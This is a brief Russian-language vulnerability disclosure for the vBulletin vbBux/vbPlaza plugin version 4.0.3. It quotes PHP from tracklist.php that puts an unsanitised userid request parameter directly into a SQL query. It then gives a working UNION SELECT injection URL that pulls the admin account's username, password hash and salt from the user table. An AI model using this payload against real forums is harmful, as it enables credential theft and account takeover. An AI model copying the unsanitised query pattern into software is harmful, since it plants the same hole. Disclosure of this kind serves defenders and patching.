vBulletin vbBux and vbPlaza v4 Plugin – SQL Injection

Плагин: http://www.vbulletin.org/forum/showthread.php?t=270271
Версия: 4.0.3 (Последняя)
Версия vB: 4.x.x


Уязвимый код находится в файле /vbplaza/tracklist.php:
 

// try to get the songs for this user
if (empty($_REQUEST['userid']))
{
// set it to the currently logged in user
$_REQUEST['userid'] = $vbulletin->userinfo['userid'];
}

// grab any user tracks from the database
$usertrack_cache = array();
if ($usertracks = $vbulletin->db->query_read("
SELECT *
FROM " . TABLE_PREFIX . "vbplaza_track_user
WHERE userid = " . $_REQUEST['userid'] . "
ORDER BY displayorder, usertrackid
")) SQL код:

http://example.com/vbplaza/tracklist.php?userid=userid UNION ALL SELECT null, null, null, null, null, null, concat(username, 0x3a, password, 0x3a, salt), null, null FROM user WHERE userid = 1